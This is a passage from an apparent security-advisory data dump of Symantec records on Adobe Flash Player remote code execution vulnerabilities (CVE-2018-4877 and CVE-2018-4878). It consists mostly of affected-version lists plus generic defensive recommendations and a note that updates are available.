Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.559 \n * Adobe Flash Player 11.2.202.569 \n * Adobe Flash Player 11.2.202.577 \n * Adobe Flash Player 11.2.202.616 \n * Adobe Flash Player 11.2.202.621 \n * Adobe Flash Player 11.2.202.626 \n * Adobe Flash Player 11.2.202.632 \n * Adobe Flash Player 11.2.202.635 \n * Adobe Flash Player 11.2.202.644 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 18.0.0.324 \n * Adobe Flash Player 18.0.0.326 \n * Adobe Flash Player 18.0.0.329 \n * Adobe Flash Player 18.0.0.333 \n * Adobe Flash Player 18.0.0.343 \n * Adobe Flash Player 18.0.0.352 \n * Adobe Flash Player 18.0.0.360 \n * Adobe Flash Player 18.0.0.366 \n * Adobe Flash Player 18.0.0.375 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 20.0.0.267 \n * Adobe Flash Player 20.0.0.272 \n * Adobe Flash Player 20.0.0.286 \n * Adobe Flash Player 20.0.0.306 \n * Adobe Flash Player 21.0 \n * Adobe Flash Player 21.0.0.182 \n * Adobe Flash Player 21.0.0.197 \n * Adobe Flash Player 21.0.0.213 \n * Adobe Flash Player 21.0.0.216 \n * Adobe Flash Player 21.0.0.226 \n * Adobe Flash Player 21.0.0.241 \n * Adobe Flash Player 21.0.0.242 \n * Adobe Flash Player 22.0.0.192 \n * Adobe Flash Player 23.0.0.162 \n * Adobe Flash Player 23.0.0.185 \n * Adobe Flash Player 23.0.0.205 \n * Adobe Flash Player 23.0.0.207 \n * Adobe Flash Player 24.0.0.186 \n * Adobe Flash Player 24.0.0.194 \n * Adobe Flash Player 24.0.0.221 \n * Adobe Flash Player 25.0.0.127 \n * Adobe Flash Player 25.0.0.148 \n * Adobe Flash Player 25.0.0.163 \n * Adobe Flash Player 25.0.0.171 \n * Adobe Flash Player 26.0.0.120 \n * Adobe Flash Player 26.0.0.126 \n * Adobe Flash Player 26.0.0.131 \n * Adobe Flash Player 26.0.0.137 \n * Adobe Flash Player 26.0.0.151 \n * Adobe Flash Player 27.0.0.130 \n * Adobe Flash Player 27.0.0.159 \n * Adobe Flash Player 27.0.0.170 \n * Adobe Flash Player 27.0.0.187 \n * Adobe Flash Player 28.0.0.126 \n * Adobe Flash Player 28.0.0.137 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 7.61 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Google Chrome \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-02-06T00:00:00", "published": "2018-02-06T00:00:00", "id": "SMNTC-102930", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102930", "type": "symantec", "title": "Adobe Flash Player CVE-2018-4877 Use After Free Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T06:16:49", "bulletinFamily": "software", "cvelist": ["CVE-2018-4878"], "description": "### Description\n\nAdobe Flash Player is prone to an unspecified remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Successful exploitation could potentially allow an attacker to take control of the affected system. Adobe Flash Player version 28.0.0.137 and prior versions are vulnerable.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.559 \n * Adobe Flash Player 11.2.202.569 \n * Adobe Flash Player 11.2.202.577 \n * Adobe Flash Player 11.2.202.616 \n * Adobe Flash Player 11.2.202.621 \n * Adobe Flash Player 11.2.202.626 \n * Adobe Flash Player 11.2.202.632 \n * Adobe Flash Player 11.2.202.635 \n * Adobe Flash Player 11.2.202.644 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 18.0.0.324 \n * Adobe Flash Player 18.0.0.326 \n * Adobe Flash Player 18.0.0.329 \n * Adobe Flash Player 18.0.0.333 \n * Adobe Flash Player 18.0.0.343 \n * Adobe Flash Player 18.0.0.352 \n * Adobe Flash Player 18.0.0.360 \n * Adobe Flash Player 18.0.0.366 \n * Adobe Flash Player 18.0.0.375 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 20.0.0.267 \n * Adobe Flash Player 20.0.0.272 \n * Adobe Flash Player 20.0.0.286 \n * Adobe Flash Player 20.0.0.306 \n * Adobe Flash Player 21.0 \n * Adobe Flash Player 21.0.0.182 \n * Adobe Flash Player 21.0.0.197 \n * Adobe Flash Player 21.0.0.213 \n * Adobe Flash Player 21.0.0.216 \n * Adobe Flash Player 21.0.0.226 \n * Adobe Flash Player 21.0.0.241 \n * Adobe Flash Player 21.0.0.242 \n * Adobe Flash Player 22.0.0.192 \n * Adobe Flash Player 23.0.0.162 \n * Adobe Flash Player 23.0.0.185 \n * Adobe Flash Player 23.0.0.205 \n * Adobe Flash Player 23.0.0.207 \n * Adobe Flash Player 24.0.0.186 \n * Adobe Flash Player 24.0.0.194 \n * Adobe Flash Player 24.0.0.221 \n * Adobe Flash Player 25.0.0.127 \n 